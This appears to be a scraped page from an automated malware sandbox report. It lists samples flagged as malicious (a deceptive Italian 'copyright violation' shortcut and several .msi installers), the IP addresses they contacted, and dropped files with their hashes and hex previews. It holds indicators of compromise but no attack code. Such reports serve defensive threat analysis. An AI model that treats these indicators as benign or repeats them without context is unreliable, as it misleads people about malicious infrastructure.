                                                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        qKIpxnvEyJ.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        3PALEJZmqL.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        8GPpalEkUp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        mi8RDkNH3K.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 20.198.118.190
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        • 3.125.209.94
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15

                                                                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.7484428190611239
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0G:9JZj5MiKNnNhoxuR
                                                                                                                                                                                                                                                                                                                        MD5:5DD803537AFE86BCC29342E38D9F0E81
                                                                                                                                                                                                                                                                                                                        SHA1:0B46DBBFAD218C4612736955F99AF07660AE7EF8
                                                                                                                                                                                                                                                                                                                        SHA-256:D62140144E3A95D929A7EB1ABDDE510DF15AAA82A511E066685E9B65E1F551C2
                                                                                                                                                                                                                                                                                                                        SHA-512:9976C184EF4C45EFBAE0E74C8CAEF34E7D26017F80C56838247FA30B5ABAFCA91521528FD855E2E01A5E70FFB32239079B8F8A44E4B5DC49664791A9BF50B414
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0x9a222179, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.75563830398524
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                                                                                                                        MD5:F1B150A3490007969957E62E930F84B8
                                                                                                                                                                                                                                                                                                                        SHA1:6B8503A2C9AC6FD10319C517257705A2493C7189
                                                                                                                                                                                                                                                                                                                        SHA-256:0012FEDF7F918892884E7465678FBB9A39E105B989C2116FA97DB010E6D1E9EF
                                                                                                                                                                                                                                                                                                                        SHA-512:A382195E81F994FF9F35936D1C36107E0CDD98F711EAF4B9F75C5DB08936DD171D219C78FB4F68ADAEEF18620D15A784F81D789A636937E09FD93B6B4E8F97DD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:."!y... .......7.......X\...;...{......................0.e......!...{?..(...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................'7K..(...|....................-R.(...|w..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0795148184882136
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:GAyYeFmVqfNaAPaU1lzIvpE/alluxmO+l/SNxOf:byzFcANDPaUkv7gmOH
                                                                                                                                                                                                                                                                                                                        MD5:C0CE0543DDD9727149F9330694646316
                                                                                                                                                                                                                                                                                                                        SHA1:C80496287FC55104C401FAA1269883D741B34D33
                                                                                                                                                                                                                                                                                                                        SHA-256:49CABE5BE6B7AE6EA5F5D0730FC21BEFD0CE9C9698B3E83711B3CDAB24896853
                                                                                                                                                                                                                                                                                                                        SHA-512:8779EDBF0021D9F69B57D30FB3019761C711148EE2EB92FE146B4B6760EC675E92B023CF01227E7A2E42B5B5562E24688BA31711B3D251FBA5CAD9B7F4804E26
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:..Rt.....................................;...{...(...|w..!...{?..........!...{?..!...{?..g...!...{?...................-R.(...|w.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_2fcea249-f5aa-449d-b626-19aea70d481f\Report.wer

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6602093103977777
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:vaFfcp3enqigKJ2s3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/y:SoQHn2xR0apYKjqzuiF3Z24lO8JO
                                                                                                                                                                                                                                                                                                                        MD5:8C2985D374C4E17091B256605FCD4833
                                                                                                                                                                                                                                                                                                                        SHA1:4DB40702FCF9800CED3A930F8F3D51D9038D1F1A
                                                                                                                                                                                                                                                                                                                        SHA-256:430BA67FF570F946CE6EFC6710940CC65A5878CC1A2EA2AE885FEE9D15984C8E
                                                                                                                                                                                                                                                                                                                        SHA-512:1F43A40A4238BF58378D6D494694B544E40E9911D2059F91F8F09BFCB2F1643F3F8828E99229C4FDDC9450198BAE0DB9AB5F35358F4DDA1155EEFE67B3905143
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.6.0.7.9.2.8.8.5.5.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.6.0.8.0.0.5.6.0.1.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.c.e.a.2.4.9.-.f.5.a.a.-.4.4.9.d.-.b.6.2.6.-.1.9.a.e.a.7.0.d.4.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.b.7.b.c.a.7.-.6.4.6.6.-.4.7.5.9.-.a.a.4.e.-.4.6.e.9.0.6.0.9.1.6.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.3.8.-.0.0.0.1.-.0.0.1.5.-.7.1.6.3.-.4.c.b.6.2.a.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2012.tmp.dmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:41:19 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):46566
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.301397160891619
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:5K8E3yERdn9Hy2NoOiYJNI7i7cgdn8U2lg1efGcpKKswHkyWIw+TIgDlrlZtA:v63voBYJNeOcgdn8hWc0KswE32DlxZtA
                                                                                                                                                                                                                                                                                                                        MD5:2AEFCE593B20EEFC13C23F5315136832
                                                                                                                                                                                                                                                                                                                        SHA1:C7AC27F7026F4AD6841E0DF95018D16B4B6DA4B8
                                                                                                                                                                                                                                                                                                                        SHA-256:8EF6E70D2B7933EE5B8C7D09BAE79E3B3A724DFED7F2750AC03ADE446E55C69A
                                                                                                                                                                                                                                                                                                                        SHA-512:A2C2BD6B5892B74C8C24D92F812273E1A3D268FD9DA33589D47C0EDB78BDC840929B24A6113E1331CA32383F60DF9B1238FC4785059F79A7CE27ABA85C4F74CC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:MDMP..a..... .......?}Xg........................................2!..........T.......8...........T...............6.......................................................................................................eJ..............Lw......................T.......8...;}Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20CE.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):8618
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6873913852356206
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJxDVG6YoVmJ7Xgmfr57v6pDG89bHnJfytm:R6lXJFU6YrJ7XgmfrFvoHJfR
                                                                                                                                                                                                                                                                                                                        MD5:CFBA8B1A5615BCD09484046BEF1E7D9C
                                                                                                                                                                                                                                                                                                                        SHA1:B77FB1CF32E4FC7568AA9F78FDF876EE74CBE38D
                                                                                                                                                                                                                                                                                                                        SHA-256:184ECEC09E3FF45D600B15E9D24DB285116F5B8A9C2E0135CFBFDB56612C566D
                                                                                                                                                                                                                                                                                                                        SHA-512:E6C187E609C1E3AF7279559EB8F00F7F772A6AF40FF97A7ACCE2C987242900630E5A697036BBAA60618C7EE3882455125DB9E330F74F15D826F07F975E091E39
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.8.8.<./.P.i.

                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER215C.tmp.xml

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4853
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.442685794450004
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsvJg771I9tSWpW8VYzYm8M4Jk5LvM6F6yq8vU5LvMBaMuOFd:uIjfRI7Wz7VLJcjMVWsjMB1uEd
                                                                                                                                                                                                                                                                                                                        MD5:F417CCEB97C1E11BF96D8EB187675281
                                                                                                                                                                                                                                                                                                                        SHA1:C29B5A4AD2E7B8FB6BA934F3885E3D68A1EFB7BB
                                                                                                                                                                                                                                                                                                                        SHA-256:8E0E7BE566D3964EEBF0B813DA15186155353A5000A69996BD746B57FC090D96
                                                                                                                                                                                                                                                                                                                        SHA-512:DE3166B04185DACB0DC85DF57F1A6F6A4451E989420EF2B7EF77B6142C56094A62FA827F59BC760A4D3C8CB7B998B8167471C82B9ED893A7E742E828A14DB3B4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625484" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\15fbf062-d4c4-4940-968c-4a3e9857aa7e.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44962
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.09525994543502
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xW74i1zNtmU9v19ULlkFo/PKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7yOc1EKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:009BC92DA30ACF4CD4FE76651DF961CA
                                                                                                                                                                                                                                                                                                                        SHA1:6129BA8DB2518399A2E1266630D8D84F54FFD33F
                                                                                                                                                                                                                                                                                                                        SHA-256:9FAD9F3CB89CE954FAABFDABACE760C1BDDF42D64E47CD4C45CCCF82E4CDC1A5
                                                                                                                                                                                                                                                                                                                        SHA-512:40856C56A8EEFEDD38AC26F1A79EBB9E0D2FEDB7CC442569573E38813F999F202D2A4C8F59DC6B609FCC76C276C11D4E2EFC82D6E24205FEDD25E5B36C6B3C67
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4fc15f60-5fb9-4c4c-82d6-2a542bc1a122.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\65a2cfe9-97c1-4355-9442-3d86411e310b.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):46220
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0871241094016675
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:gMkbJrT8IeQc5dK4oQji1zNtmU9v19ULlkFo/PvXDgh1+wLCioBJDSgzMMd6qD4E:gMk1rT8H1K4u1Evkh8wLFoBtSmd6qE7I
                                                                                                                                                                                                                                                                                                                        MD5:E3DC88328497F1308932BD01D6AE54B6
                                                                                                                                                                                                                                                                                                                        SHA1:41D0B3507BA9203C0EBEA0C8C228473EB1FCAFFB
                                                                                                                                                                                                                                                                                                                        SHA-256:730BA19D69B24277421D063B3DD677CB510877DFD61F466C59881A13222ADDAB
                                                                                                                                                                                                                                                                                                                        SHA-512:42E5504661E431FBEB0FC8E4EA1444E2BE7D46E97FAC94BFC5E9BE0E54991E1BDD6CCB099C5DC97A0CFEAD9F107A88E3AD328592B64FCC72CCAA7888D1ACD9C9
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326025230846","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852429"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\824446f7-9963-4f78-a316-113b0a842efd.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
